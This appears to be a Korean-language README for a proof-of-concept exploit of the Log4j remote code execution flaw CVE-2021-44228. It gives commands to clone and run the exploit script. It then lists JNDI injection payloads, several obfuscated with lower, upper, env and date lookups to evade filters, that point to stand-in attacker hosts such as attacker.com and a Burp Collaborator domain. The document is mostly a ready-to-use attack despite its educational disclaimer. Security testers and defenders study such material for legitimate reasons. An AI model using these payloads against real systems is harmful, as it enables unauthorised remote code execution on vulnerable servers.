
이것은 Log4j RCE 인증되지 않은 (CVE-2021-44228)에 대한 개념 증명 익스플로잇입니다.
이것은 Log4j 인증되지 않은 RCE(CVE-2021-44228)에 대한 개념 증명 익스플로잇입니다.
이 취약점은 버전 < 2.15.0에 영향을 미칩니다.
자세한 정보:
https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j
이 프로젝트는 교육 목적으로만 제작되었으며, 법률 위반이나 개인적 이익을 위해 사용될 수 없습니다.
이 프로젝트의 작성자는 이 프로젝트 자료로 인해 발생할 수 있는 어떠한 피해에 대해서도 책임을 지지 않습니다.

git clone https://github.com/pedrohavay/exploit-CVE-2021-44228
cd exploit-CVE-2021-44228
pip install -r requirements.txt
스크립트 사용
python3 main.py
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:ldap://localhost:12345/Exploit}